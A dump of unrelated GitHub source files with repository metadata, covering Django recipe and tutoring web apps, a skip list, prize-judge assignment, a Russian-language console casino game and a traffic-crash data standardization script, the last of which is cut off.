'recipe':recipe,\n                'upgrade':upgrade,\n            }\n        else:\n            recipe=Recipe.objects.all().order_by('created_at').reverse()\n            \n            context={\n                'recipe':recipe,\n            }\n\n    return render(request,'home/home.html',context)\ndef filter_recipes(request,what):\n    recent=Recipe.filter_by_recent()\n    ratings=Recipe.filter_by_rating()\n    country=Recipe.filter_by_country()\n    all=Recipe.objects.all().order_by('created_at').reverse()\n    if what=='recent':\n        context={\n            'recipe':recent\n        }\n    elif what=='ratings':\n        context={\n            'recipe':ratings\n        }\n    elif what=='country':\n        context={\n            'recipe':country\n        }\n    else:\n        context={\n            'recipe':all\n        }\n    return render(request, 'home/home.html', context)\n\n\ndef viewpage(request,recipe_id):\n    \"\"\"\n    Displays a detailed view of the recipes as specified in the URL.\n    \"\"\"\n    profile=UserProfile.objects.get(user_id=request.user.id)\n    phone=profile.PhoneNumber\n    \n    upgrade=LNmpesaOnline.objects.filter(PhoneNumber=profile.PhoneNumber,Amount=1.0)\n    form=ReviewForm()\n    recipe = get_object_or_404(Recipe, pk=recipe_id)\n    if recipe.free==True or len(upgrade)>0:\n        ingredients = recipe.ingredient_set.order_by('-index')\n        directions = recipe.direction_set.order_by('-index')\n        comments=Review.objects.filter(recipe=recipe_id)\n        context = {\n            'recipe': recipe,\n            
'ingredients': ingredients,\n 'directions': directions,\n 'form':form,\n 'comments':comments\n \n }\n else:\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n return render(request,'core/rec_details.html',context)\n@login_required()\ndef user_dashboard(request):\n return render(request, 'home/dashboard.html')\n","repo_name":"stephane-evrard/RecipeAppGroup","sub_path":"recipeapp/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36162940265","text":"import json\nimport itertools\n\n\ndef process_districts(data):\n for province in data:\n yield [\n {'disctrict_name': district.get('name'),\n 'district_code': district.get('code'),\n 'province_code': province.get('code')}\n for district in province.get('districts')\n ]\n\n\nwith open('data/vietnam_nested.json', 'r') as f:\n data = json.load(f)\n list_district = process_districts(data)\n for item in itertools.islice(list_district, 0, 5):\n print(list(item))\n","repo_name":"boconlonton/dataset-init-sb","sub_path":"src/districts.py","file_name":"districts.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12499419316","text":"from django.urls import path, include\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.views import LogoutView\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('tutors/', views.tutors, name='tutors'),\n path('about/', views.about, name='about'),\n path('signup/', views.signup, name='signup'),\n path('register/', views.tutorregistration, name='tutorreg'),\n path('register/results', views.addClasses, name='addClasses'),\n path('profile/', views.profile, name='view_profile'),\n path('edit_profile/', views.edit_profile, name='editprofile'),\n path('editprof/', views.editprof, name='edit_prof'),\n path('tutorInfo/', views.tutor_info, name='tutorinfo'),\n path('review/', views.writeReview, name='review'),\n path('confirmation/', views.confirmation, name='confirmation'),\n path('addClass/', views.justAddClasses,name='classreg'),\n path('addClass/results', views.addClassPrivate, name='addClassPrivate'),\n path('removeClass/', views.deleteClass, name=\"removeClass\"),\n\n #For Google Login\n path('login/', views.login, name='login'),\n path('accounts/', include('allauth.urls')),\n path('logout', LogoutView.as_view()),\n path('test/',views.hasAccount,name=\"test\"),\n path('makeNewTutor/',views.makeNewTutor,name=\"MakeNewTutor\"),\n path('makeNewStudent/',views.makeNewStudent,name=\"MakeNewStudent\"),\n path('showtype/',views.showTutorOrStudent,name=\"ShowType\"),\n path('populate/',views.Populate,name=\"Populate\"),\n path('availability/',views.tableAval, name=\"table\"),\n path('storeCheckedBoxes/',views.storeCheckedBoxes, name='storeCheckedBoxes'),\n path('showAval/', views.showAval, name=\"ShowAvailability\"),\n path('saverequest/', views.StoreRequest,name=\"StoreRequest\"),\n path('showRequests/', views.ShowRequests,name=\"Show Requests\"),\n path('showRequestsTutor/', views.ShowRequestsTutor,name=\"Show Requests Tutor\"),\n path('showRequestsStudent/', views.ShowRequestsStudent,name=\"Show Requests Student\"),\n path('DeleteRequest/', views.DeleteRequest, name=\"Delete Request\"),\n path('AcceptRequest/',views.AcceptRequest,name=\"Accept Request\"),\n path('CancelRequest/',views.CancelRequest, name='Cancel Request'),\n 
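    # Django resolves these route names via reverse() / {% url %} lookups, and the\n    # names are matched verbatim, spaces included (e.g. reverse('Cancel Request')).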
path('EndRequest/', views.EndRequest, name='End Request'),\n    path('afterlogin/', views.afterLogin, name='After Login'),\n    path('editAvail/', views.editAvail, name=\"Edit Availability\"),\n    path('storeEditedAvail/', views.storedEditedBoxes, name=\"Store Edited Boxes\")\n]","repo_name":"abbykrug/ASDProj","sub_path":"tutoroos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32209401624","text":"from Node import Node\nimport numpy as np\n\n#This class can be run using driver.py.\n#Running this class using driver.py will confirm \n#that our implementation of the \n#Skip List data structure works.\n\nclass SkipList:\n    head:Node\n    temp:Node\n\n\n    def __init__(self):\n        self.head = Node(\"\", \"\", 0)\n        self.temp = None\n    \n    #The insert method adds a new contact \n    #(represented by a new node) to the\n    #Skip List.\n    #\n    #Parameters:\n    #1. Takes a String representing the name of the contact \n    #we want to insert into the Skip List.\n    #2. Takes a String representing the email of the contact \n    #we want to insert into the Skip List.\n    #\n    #Returns: no return value.\n    def insert(self, personName, personEmail):\n        self.temp = None\n        #get the number of levels to insert the new contact at \n        numLevels:int = self.getNumLevelsToInsertAt()\n        #create any additional levels if necessary\n        self.insertingNewLevels(numLevels)\n        tempInsertNode = self.head\n\n        while (tempInsertNode is not None):\n            \n            #if we want to place the new contact \n            #at the end of the list of nodes at a given level\n            if (tempInsertNode.nextNode is None) and tempInsertNode.name < personName:\n                #if we are at a level less than or equal to\n                #the number of levels that we will insert the contact\n                #at, create a new node to represent the new contact\n                if tempInsertNode.level <= numLevels:\n                    self.createNewNode(tempInsertNode, None, personName, personEmail)\n\n                #traverse down 1 level\n                tempInsertNode = tempInsertNode.downNode\n\n            #if we want to place the new contact in the middle of the list of nodes at a given level\n            elif tempInsertNode.name < personName and tempInsertNode.nextNode.name > personName: \n                #if we are at a level less than or equal to\n                #the number of levels that we will insert the contact\n                #at, create a new node to represent the new contact \n                if tempInsertNode.level <= numLevels:\n                    self.createNewNode(tempInsertNode, tempInsertNode.nextNode, personName, personEmail)\n                \n                #traverse down 1 level\n                tempInsertNode = tempInsertNode.downNode\n\n            #if we have not found the correct place to insert the new contact at a given level\n            elif tempInsertNode.name < personName and tempInsertNode.nextNode.name < personName:\n                #traverse forward 1 node\n                tempInsertNode = tempInsertNode.nextNode\n            \n\n    #create a new node between the current node, given by currentNode, and the \n    #node after the current node, given by nextNodeAfter\n    def createNewNode(self, currentNode, nextNodeAfter, personName, personEmail):\n        #personName and personEmail represent the name and email of the new contact\n        newNode:Node = Node(personName, personEmail, currentNode.level)\n        newNode.nextNode = nextNodeAfter\n        currentNode.nextNode = newNode\n        \n        if self.temp is not None:\n            self.temp.downNode = newNode\n        \n        self.temp = newNode\n\n\n    #creating new levels if the current number \n    #of levels is less than the number of levels\n    #that we want to insert the new contact at\n    def insertingNewLevels(self, numLevels):\n        if numLevels > self.head.level:\n
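            # Grow the tower of sentinel head nodes one level at a time; each new\n            # head links down to the previous one so that searches can descend.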
            startInsertion:int = self.head.level + 1 \n            for i in range(startInsertion, numLevels + 2):\n                newLevelNode:Node = Node(\"\", \"\", i)\n                newLevelNode.downNode = self.head\n                self.head = newLevelNode\n\n    \n    #simulates a set of coin flips and returns\n    #the number of consecutive \"heads\" flipped \n    #in a row\n    def getNumLevelsToInsertAt(self) -> int:\n        probHeads:float = 0.5\n        count:int = 0\n        while np.random.rand() < probHeads:\n            count += 1\n        return count\n\n    #The search method finds an existing contact \n    #(represented by a single node) in the\n    #Skip List.\n    #\n    #Parameters:\n    #1. Takes a String representing the name of the contact \n    #we want to look up in the Skip List.\n    #\n    #Returns: \n    #If there is a node in the Skip List containing the\n    #name of the contact that we are looking for, return that node.\n    #Else, return None.\n    def search(self, personName):\n        self.count = 0\n        nodeToReturn:Node = None\n        tempFindNode = self.head\n        found:bool = False\n        \n        while (tempFindNode is not None) and found == False:\n            \n            #if we are at the lowest level and the current node has the same name \n            #as the name we are looking for, return the current node\n            if tempFindNode.level == 0 and tempFindNode.name == personName:\n                nodeToReturn = tempFindNode\n                found = True\n            \n            #if the current node and the next node in front of \n            #it have names that are alphabetically ahead\n            #of the contact we are looking for, \n            #traverse forward by 1 node\n            elif (tempFindNode.nextNode is not None) and tempFindNode.name < personName and tempFindNode.nextNode.name <= personName:\n                tempFindNode = tempFindNode.nextNode\n            \n            #traverse down 1 level in all other cases\n            else:\n                tempFindNode = tempFindNode.downNode\n\n        return nodeToReturn\n\n","repo_name":"chakra0501/addressBook","sub_path":"SkipList.py","file_name":"SkipList.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"222633058","text":"'''\ncreate a Judge class that tracks name, keywords, and business flag and Submission class tracking ID, keywords, Judges\n'''\n\nimport math\n\nclass Submission():\n    '''\n    A class defining objects that represent prize submissions/applications, including data related to the relevant technical concepts/keywords describing the application and the submission ID.\n    '''\n\n    def __init__(self, submission_id, target_num_judges, min_num_flag_judges = 0):\n        '''\n        Constructor for Submission objects\n\n        Parameters\n        ----------\n        submission_id: str. Name or some other identifier of the Submission being created.\n\n        target_num_judges: int. The number of unique Judge objects that should be assigned to this Submission\n\n        min_num_flag_judges: int. The minimum number of flagged judges (e.g. business-savvy judges) that must be assigned to this Submission. A value of 0 indicates that flags can be ignored (flagged Judge objects aren't treated as special compared to unflagged Judge objects).\n        '''\n\n        self.id = submission_id\n\n        self.target_num = target_num_judges\n\n        #In case min_num_flag_judges is actually float...\n        self.min_num_flag = math.floor(min_num_flag_judges)\n\n        self.assigned_judges = []\n        self.flag_count = 0\n        self.unflagged_count = 0\n\n\n    def assign_judge(self, judge):\n\n        '''\n        Assigns Judge object to review this application/submission. Checks to make sure the Judge being assigned is the right kind (flagged vs. 
not) and that the max number of Judges isn't exceeded.\n\n        Parameters\n        ----------\n        judge: Judge object that represents the person you want to review this Submission. \n        '''\n\n        #How many spots are still being held for flagged and unflagged judges?\n        flagged_slots_left = self.min_num_flag - self.flag_count\n        unflagged_slots_left = self.target_num - self.min_num_flag - self.unflagged_count\n\n        #Make sure we haven't already assigned all the judges we need\n        if len(self.assigned_judges) < self.target_num:\n            #Are there any flagged judges required and \n            #have we not hit that number yet?\n            if self.min_num_flag > 0 and self.flag_count < self.min_num_flag:\n                #Assign judge if flag = True and increment the counter\n                if judge.flag:\n                    self.assigned_judges.append(judge.assign(self))\n                    self.flag_count += 1\n\n                #Assign judge if there are non-flag slots left\n                elif unflagged_slots_left > 0:\n                    self.assigned_judges.append(judge.assign(self))\n                    self.unflagged_count += 1\n\n                #No unflagged slots left and Judge isn't flagged\n                else:\n                    raise AssertionError(\"Judge doesn't satisfy Submission flag requirements\")\n\n            #Assign judge, as flags don't matter\n            else: \n                self.assigned_judges.append(judge.assign(self))\n                self.unflagged_count += 1\n        else:\n            raise AssertionError(\"Too many Judges assigned to this Submission\")\n\n\n    def __str__(self): \n        return f\"Submission ID: {self.id}\\nTarget Number of Judges: {self.target_num}\\nNumber of Assigned Judges: {len(self.assigned_judges)}\\nNumber of Assigned Flagged Judges: {self.flag_count}\\nNumber of Assigned Unflagged Judges: {self.unflagged_count}\"","repo_name":"emigre459/SolarPrize","sub_path":"Submission.py","file_name":"Submission.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19972650886","text":"from ctypes import *\nimport random\nimport time\n\nvaluta = \"$\"\nmoney = 0\ndefault_money = 10000\nwindll.Kernel32.GetStdHandle.restype = c_ulong\nh = windll.Kernel32.GetStdHandle(c_ulong(0xfffffff5))\nplayGame = True\n\n# ================================================================================\n\n# Print the win message\ndef win(result):\n    color(14)\n    print(f\" Victory is yours! *Toss a coin to your Witcher*: {result} {valuta}\")\n    print(f\" Your balance is {money} {valuta}\")\n\n# Print the loss message\ndef loss(result):\n    color(12)\n    print(f\" Unfortunately, a loss: {result} {valuta}\")\n    print(f\" Your balance is {money} {valuta}\")\n\n# Read the remaining balance from the file\ndef load_money():\n    try:\n        f = open(\"money.dat\", \"r\")\n        m = int(f.readline())\n        f.close()\n    except FileNotFoundError:\n        print(f\"The file does not exist. Using the default of {default_money} {valuta}.\")\n        m = default_money\n    return m\n\n# Write the balance to the file\ndef save_money(moneyToSave):\n    try:\n        f = open(\"money.dat\", \"w\")\n        f.write(str(moneyToSave))\n        f.close()\n    except:\n        print(\"Error creating the file. Our casino is closing!\")\n        quit(0)\n
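# Note: SetConsoleTextAttribute treats the low four bits of its argument as the\n# foreground colour (7 = light grey, 10 = light green, 12 = light red, 14 = yellow),\n# so each color(c) call below recolours all subsequent output. This relies on\n# ctypes.windll and therefore only runs on Windows consoles.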
Наше Казино закрывается!\")\n        quit(0)\n\n# Установка цвета текста\ndef color(c):\n    windll.Kernel32.SetConsoleTextAttribute(h, c)\n\n# Вывод на экран цветного, обрамленного звездочками текста\ndef colorLine(c, s):\n    for i in range(30):\n        print()\n    color(c)\n    print(\"*\" * (len(s) + 2))\n    print(\"*\" + s + \"*\")\n    print(\"*\" * (len(s) + 2))\n\n# Функция ввода целого числа\ndef getIntInput(minimum, maximum, message):\n    color(7)\n    ret = -1\n    while ret < minimum or ret > maximum:\n        st = input(message)\n        if st.isdigit():\n            ret = int(st)\n        else:\n            print(\" Введите целое число!\")\n    return ret\n\n# Функция ввода значения\ndef getInput(digit, message):\n    color(7)\n    ret = \"\"\n    while ret == \"\" or not ret in digit:\n        ret = input(message)\n    return ret\n\n# ================================================================================\n\n# Главный цикл\ndef main():\n    global money, playGame\n\n    money = load_money()\n    start_money = money\n\n    while playGame and money > 0:\n        colorLine(10, \"Приветствую тебя в нашем заведении 'Азино 777' !\")\n        color(14)\n        print(f\" У тебя на счету {money} {valuta}.\")\n\n        color(6)\n        print(\" Ты можешь сыграть в:\")\n        print(\" 1. Рулетка\")\n        print(\" 2. Кости\")\n        print(\" 3. Однорукий бандит\")\n        print(\" 0. Выход. Ставка 0 в играх - выход\\n\")\n        color(7)\n\n        x = getInput(\"0123\", \" Твой выбор? \")\n        if x == \"0\":\n            playGame = False\n        elif x == \"1\":\n            roulette()\n        elif x == \"2\":\n            dice()\n        elif x == \"3\":\n            one_hand_bandit()\n\n\n    colorLine(12, \"Жаль, что ты покидаешь нас! Возвращайся скорей!\")\n    color(13)\n    if money <= 0:\n        print(\" Упс... Ты остался без денег. Возьми микрокредит и возвращайся!\")\n\n    color(11)\n    if money > start_money:\n        print(\"Ну что ж, поздравляю с прибылью!\")\n        print(f\"На начало игры у тебя было {start_money} {valuta}.\")\n        print(f\"Сейчас уже {money} {valuta}! 
Играй ещё и приумножай!\")\n elif money == start_money:\n print(\"Ты остался в нуле!\")\n print(f\"Сумма осталась такой же: {money} {valuta}\")\n print(\"В следующий раз все обязательно получится!\")\n else:\n print(f\"К сожалению, ты проиграл {start_money - money} {valuta}.\")\n print(\"В следующий раз все обязательно получится!\")\n\n save_money(money)\n\n color(7) # Устанавливаем цвет консоли на стандартный\n input(\"Нажми Enter, чтобы выйти...\")\n quit() # Выход\n\n# Анимация рулетки\ndef getRoulette(visable):\n tickTime = random.randint(100, 200) / 10000\n mainTime = 0\n number = random.randint(0, 38)\n increaseTickTime = random.randint(100, 110) / 100\n col = 1\n\n while mainTime < 0.7:\n col += 1\n if col > 15:\n col = 1\n\n mainTime += tickTime\n tickTime *= increaseTickTime\n\n color(col)\n number += 1\n if number > 38:\n number = 0\n print()\n printNumber = number\n if number == 37:\n printNumber = \"00\"\n elif number == 38:\n printNumber = \"000\"\n\n print(\" Число >\",\n printNumber,\n \"*\" * number,\n \" \" * (79 - number * 2),\n \"*\" * number)\n\n if visable:\n time.sleep(mainTime)\n return number\n\n# Анимация костей\ndef getDice():\n count = random.randint(3, 8)\n sleep = 0\n while count > 0:\n color(count + 7)\n x = random.randint(1, 6)\n y = random.randint(1, 6)\n print(\" \" * 10, \"----- -----\")\n print(\" \" * 10, f\"| {x} | | {y} |\")\n print(\" \" * 10, \"----- -----\")\n time.sleep(sleep)\n sleep += 1 / count\n count -= 1\n return x + y\n\n# Подсчет однорукого бандита\ndef getMaxCount(digit, v1, v2, v3, v4, v5):\n ret = 0\n if digit == v1:\n ret += 1\n if digit == v2:\n ret += 1\n if digit == v3:\n ret += 1\n if digit == v4:\n ret += 1\n if digit == v5:\n ret += 1\n return ret\n\n# Анимация однорукого бандита\ndef getOHBRes(stavka):\n res = stavka\n d1 = 0\n d2 = 0\n d3 = 0\n d4 = 0\n d5 = 0\n\n get_d1 = True\n get_d2 = True\n get_d3 = True\n get_d4 = True\n get_d5 = True\n col = 10\n\n while get_d1 or get_d2 or get_d3 or get_d4 or get_d5:\n if get_d1:\n d1 += 1\n if get_d2:\n d2 -= 1\n if get_d3:\n d3 += 1\n if get_d4:\n d4 -= 1\n if get_d5:\n d5 += 1\n\n if d1 > 9:\n d1 = 0\n if d2 < 0:\n d2 = 9\n if d3 > 9:\n d3 = 0\n if d4 < 0:\n d4 = 9\n if d5 > 9:\n d5 = 0\n\n if random.randint(0, 20) == 1:\n get_d1 = False\n if random.randint(0, 20) == 1:\n get_d2 = False\n if random.randint(0, 20) == 1:\n get_d3 = False\n if random.randint(0, 20) == 1:\n get_d4 = False\n if random.randint(0, 20) == 1:\n get_d5 = False\n\n time.sleep(0.1)\n color(col)\n col += 1\n if col > 15:\n col = 10\n\n print(\" \" + \"%\" * 10)\n print(f\" {d1} {d2} {d3} {d4} {d5}\")\n\n max_count = getMaxCount(d1, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d2, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d2, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d3, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d3, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d4, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d4, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d5, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d5, d1, d2, d3, d4, d5)\n\n color(14)\n if max_count == 2:\n print(f\" Совпадение двух чисел! Твой выигрыш в размере ставки: {res} {valuta}.\")\n elif max_count == 3:\n res *= 2\n print(f\" Совпадение трех чисел! Твой выигрыш 2:1: {res} {valuta}.\")\n elif max_count == 4:\n res *= 5\n print(f\" Совпадение четырех чисел! Твой выигрыш 5:1: {res} {valuta}.\")\n elif max_count == 5:\n res *= 10\n print(f\" БИНГО! Совпадение всех чисел! 
Твой выигрыш 10:1: {res} {valuta}.\")\n    else:\n        loss(res)\n        res = 0\n\n    color(11)\n    print()\n    input(\" Нажмите Enter для продолжения...\")\n\n    return res\n\n# ================================================================================\n\n# Рулетка\ndef roulette():\n    global money\n    playGame = True\n    while playGame and money > 0:\n        colorLine(3, \"ДОБРО ПОЖАЛОВАТЬ НА ИГРУ В РУЛЕТКУ\")\n        color(14)\n        print(f\"\\n У тебя на счету {money} {valuta}.\\n\")\n        color(11)\n        print(\" Ставлю на ...\")\n        print(\" 1. Четное (выигрыш 1:1)\")\n        print(\" 2. Нечетное (выигрыш 1:1)\")\n        print(\" 3. Дюжина (выигрыш 3:1)\")\n        print(\" 4. Число (выигрыш 36:1)\")\n        print(\" 0. Возврат в меню\\n\")\n\n        x = getInput(\"01234\", \" Твой выбор? \")\n        play_roulette = True\n\n        if x == \"3\":\n            color(2)\n            print()\n            print(\" Выбери диапазон:...\")\n            print(\" 1. От 0 до 12\")\n            print(\" 2. От 13 до 24\")\n            print(\" 3. От 25 до 36\")\n            print(\" 0. Назад\\n\")\n\n            duzhina = getInput(\"0123\", \" Твой выбор? \")\n\n            if duzhina == \"1\":\n                text_duzhina = \"от 0 до 12\"\n            elif duzhina == \"2\":\n                text_duzhina = \"от 13 до 24\"\n            elif duzhina == \"3\":\n                text_duzhina = \"от 25 до 36\"\n            elif duzhina == \"0\":\n                play_roulette = False\n\n        elif x == \"4\":\n            chislo = getIntInput(0, 36, \" На какое число ставишь (0..36)? \")\n\n        color(7)\n        if x == \"0\":\n            return 0\n\n        if play_roulette:\n            stavka = getIntInput(0, money, f\" Сколько поставишь (не больше {money} {valuta})? \")\n            if stavka == 0:\n                return 0\n\n            number = getRoulette(True)\n\n            if x == \"1\":\n                print(\" Ты поставил на ЧЕТНОЕ!\")\n                if number < 37 and number % 2 == 0:\n                    money += stavka\n                    win(stavka)\n                else:\n                    money -= stavka\n                    loss(stavka)\n            elif x == \"2\":\n                print(\" Ты поставил на НЕЧЕТНОЕ!\")\n                if number < 37 and number % 2 != 0:\n                    money += stavka\n                    win(stavka)\n                else:\n                    money -= stavka\n                    loss(stavka)\n            elif x == \"3\":\n                print(f\" Ставка сделана на диапазон чисел {text_duzhina}.\")\n                winDuzhina = \"\"\n                if number < 13:\n                    winDuzhina = \"1\"\n                elif 12 < number < 25:\n                    winDuzhina = \"2\"\n                elif number > 24:\n                    winDuzhina = \"3\"\n\n                if duzhina == winDuzhina:\n                    money += stavka * 2\n                    win(stavka * 3)\n                else:\n                    money -= stavka\n                    loss(stavka)\n            elif x == \"4\":\n                print(f\" Ставка сделана на число {chislo}.\")\n                if number == chislo:\n                    money += stavka * 35\n                    win(stavka * 36)\n                else:\n                    money -= stavka\n                    loss(stavka)\n\n            print()\n            input(\" Нажмите Enter для продолжения...\")\n\n# Кости\ndef dice():\n    global money\n    playGame = True\n\n    while playGame:\n        print()\n        colorLine(3, \"ДОБРО ПОЖАЛОВАТЬ НА ИГРУ В КОСТИ!\")\n        color(14)\n        print(f\"\\n У тебя на счету {money} {valuta}.\")\n\n        color(7)\n        stavka = getIntInput(0, money, f\" Сделай ставку в пределах {money} {valuta}: \")\n        if stavka == 0:\n            return 0\n\n        playRound = True\n        control = stavka\n        oldResult = getDice()\n        firstPlay = True\n\n        while playRound and stavka > 0 and money > 0:\n            if stavka > money:\n                stavka = money\n            color(11)\n            print(f\"\\n В твоем распоряжении {stavka} {valuta}.\")\n            color(12)\n            print(f\"\\n Текущая сумма чисел на костях: {oldResult}.\")\n            color(11)\n            print(\"\\n Сумма чисел на гранях будет больше, меньше или равна предыдущей?\")\n            color(7)\n            x = getInput(\"0123\", \" Введите 1 - больше, 2 - меньше, 3 - равна или 0 - выход: \")\n\n            if x != \"0\":\n                firstPlay = False\n                if stavka > money:\n                    stavka = money\n\n                money -= stavka\n                diceResult = getDice()\n\n                is_win = False\n                if (oldResult > diceResult and x == \"2\") or (oldResult < diceResult and x == \"1\"):\n                    is_win = True\n\n                if not x == \"3\":\n                    if is_win:\n                        money += 
stavka + stavka // 5\n color(14)\n print(f\" Победа за тобой! *Ведьмаку заплатите чеканной монетой*: {stavka // 5} {valuta}\")\n stavka += stavka // 5\n else:\n stavka = control\n loss(stavka)\n elif x == \"3\":\n if oldResult == diceResult:\n money += stavka * 3\n win(stavka * 3)\n stavka *= 3\n else:\n stavka = control\n loss(stavka)\n\n oldResult = diceResult\n\n else:\n if firstPlay:\n money -= stavka\n playRound = False\n\n# Однорукий бандит\ndef one_hand_bandit():\n global money\n playGame = True\n\n while playGame:\n colorLine(3, \"ДОБРО ПОЖАЛОВАТЬ НА ИГРУ В ОДНОРУКОГО БАНДИТА!\")\n color(14)\n print(f\"\\n У тебя на счету {money} {valuta}.\\n\")\n color(5)\n print(\" Правила игры:\")\n print(\" 1. При совпадении 2-х чисел ставка не списывается.\")\n print(\" 2. При совпадении 3-х чисел выигрыш 2:1.\")\n print(\" 3. При совпадении 4-х чисел выигрыш 5:1.\")\n print(\" 4. При совпадении 5-ти чисел выигрыш 10:1.\")\n print(\" 5. Ставка 0 для завершении игры.\\n\")\n\n stavka = getIntInput(0, money, f\" Введите ставку от 0 до {money} {valuta}: \")\n\n if stavka == 0:\n return 0\n\n money -= stavka\n money += getOHBRes(stavka)\n\n if (money <= 0):\n playGame = False\n\n\n# ================================================================================\n# ================================================================================\n\nmain()","repo_name":"ThisISky/learning","sub_path":"Casino [learn ver].py","file_name":"Casino [learn ver].py","file_ext":"py","file_size_in_byte":15971,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29983682087","text":"# Standardize a crashes CSV into compatible JSON document.\n# Author terryf82 https://github.com/terryf82\n\nimport argparse\nimport os\nimport pandas as pd\nfrom collections import OrderedDict\nimport csv\nimport calendar\nimport random\nimport dateutil.parser as date_parser\nfrom .standardization_util import parse_date, validate_and_write_schema\nfrom data.geocoding_util import read_geocode_cache\nimport data.config\n\nCURR_FP = os.path.dirname(\n os.path.abspath(__file__))\nBASE_FP = os.path.dirname(os.path.dirname(CURR_FP))\n\ndef validate_coords(crash: dict, lat_field: str, lon_field: str):\n \"\"\"\n Validates latitude/longitude values, returns numeric values\n Args:\n crash: crash data\n lat_field: lat field name\n lon_field: lon field name\n Returns: tuple of float values or None, if invalid\n \"\"\"\n if lat_field and lon_field:\n try:\n # if strings, try and convert\n lat = float(crash[lat_field])\n lon = float(crash[lon_field])\n except ValueError:\n return\n if abs(lat) > 90:\n return\n if abs(lon) > 180:\n return\n return lat, lon\n\n\n\n\ndef read_standardized_fields(raw_crashes: dict, fields: dict, opt_fields: dict,\n timezone: str, datadir: str, city: str,\n startdate=None, enddate=None) -> dict:\n\n crashes = {}\n # Drop times from startdate/enddate in the unlikely event\n # they're passed in\n if startdate:\n startdate = parse_date(startdate, timezone)\n startdate = date_parser.parse(startdate).date()\n if enddate:\n enddate = parse_date(enddate, timezone)\n enddate = date_parser.parse(enddate).date()\n\n min_date = None\n max_date = None\n \n cached_addresses = {}\n\n if (not fields['latitude'] or not fields['longitude']):\n if 'address' in opt_fields and opt_fields['address']:\n # load cache for geocode lookup\n geocoded_file = os.path.join(\n datadir, 'processed', 'geocoded_addresses.csv')\n if os.path.exists(geocoded_file):\n cached_addresses = 
read_geocode_cache(\n filename=os.path.join(\n datadir, 'processed', 'geocoded_addresses.csv'))\n else:\n\n raise SystemExit(\n \"Need to geocode addresses before standardizing crashes\")\n else:\n raise SystemExit(\n \"Can't standardize crash data, no lat/lon or address found\"\n )\n\n no_geocoded_count = 0\n for i, crash in enumerate(raw_crashes):\n if i % 10000 == 0:\n print(i)\n\n lat_lon = validate_coords(crash, fields['latitude'], fields['longitude'])\n if lat_lon:\n lat, lon = lat_lon\n\n else:\n # skip any crashes that don't have coordinates\n if 'address' not in opt_fields or opt_fields['address'] not in crash:\n continue\n\n address = crash[opt_fields['address']] + ' ' + city\n\n # If we have an address, look it up in the geocoded cache\n if address in cached_addresses:\n address, lat, lon, _ = cached_addresses[address]\n if not address:\n no_geocoded_count += 1\n continue\n else:\n no_geocoded_count += 1\n continue\n\n # construct crash date based on config settings, skipping any crashes without date\n if fields[\"date_complete\"]:\n if not crash[fields[\"date_complete\"]]:\n continue\n\n else:\n crash_date = crash[fields[\"date_complete\"]]\n\n elif fields[\"date_year\"]:\n # TODO: generally, we don't need date anymore, we should remove it\n # for now, month is always january if unspecified\n date_month = 1\n date_year = int(crash[fields[\"date_year\"]])\n if fields[\"date_month\"]:\n date_month = int(crash[fields[\"date_month\"]])\n if fields[\"date_day\"]:\n crash_date = f'{date_year}-{date_month}-{crash[fields[\"date_day\"]]}'\n # some cities do not supply a day of month for crashes, randomize if so\n else:\n available_dates = calendar.Calendar().itermonthdates(\n date_year, date_month)\n crash_date = str(random.choice(\n [date for date in available_dates if date.month == date_month]))\n # skip any crashes that don't have a date\n else:\n continue\n\n crash_time = None\n if fields[\"time\"]:\n crash_time = crash[fields[\"time\"]]\n\n if fields[\"time_format\"]:\n crash_date_time = parse_date(\n crash_date,\n timezone,\n crash_time,\n fields[\"time_format\"]\n )\n\n else:\n crash_date_time = parse_date(\n crash_date,\n timezone,\n crash_time\n )\n\n # Skip crashes where date can't be parsed\n if not crash_date_time:\n continue\n\n crash_day = date_parser.parse(crash_date_time).date()\n # Drop crashes that occur outside of the range, if specified\n if ((startdate is not None and crash_day < startdate) or\n (enddate is not None and crash_day > enddate)):\n\n continue\n if min_date is None or crash_day < min_date:\n min_date = crash_day\n if max_date is None or crash_day > max_date:\n max_date = crash_day\n\n formatted_crash = OrderedDict([\n (\"id\", crash[fields[\"id\"]]),\n (\"dateOccurred\", crash_date_time),\n (\"location\", OrderedDict([\n (\"latitude\", float(lat)),\n (\"longitude\", float(lon))\n ]))\n ])\n formatted_crash = add_city_specific_fields(crash, formatted_crash,\n opt_fields)\n crashes[formatted_crash[\"id\"]] = formatted_crash\n\n if min_date and max_date:\n print(\"Including crashes between {} and {}\".format(\n min_date.isoformat(), max_date.isoformat()))\n elif min_date:\n print(\"Including crashes after {}\".format(\n min_date.isoformat()))\n elif max_date:\n print(\"Including crashes before {}\".format(\n max_date.isoformat()))\n\n # Making sure we have enough entries with lat/lon to continue\n if len(crashes) > 0 and no_geocoded_count/len(raw_crashes) > .9:\n raise SystemExit(\"Not enough geocoded addresses found, exiting\")\n \n return crashes\n\n\ndef 
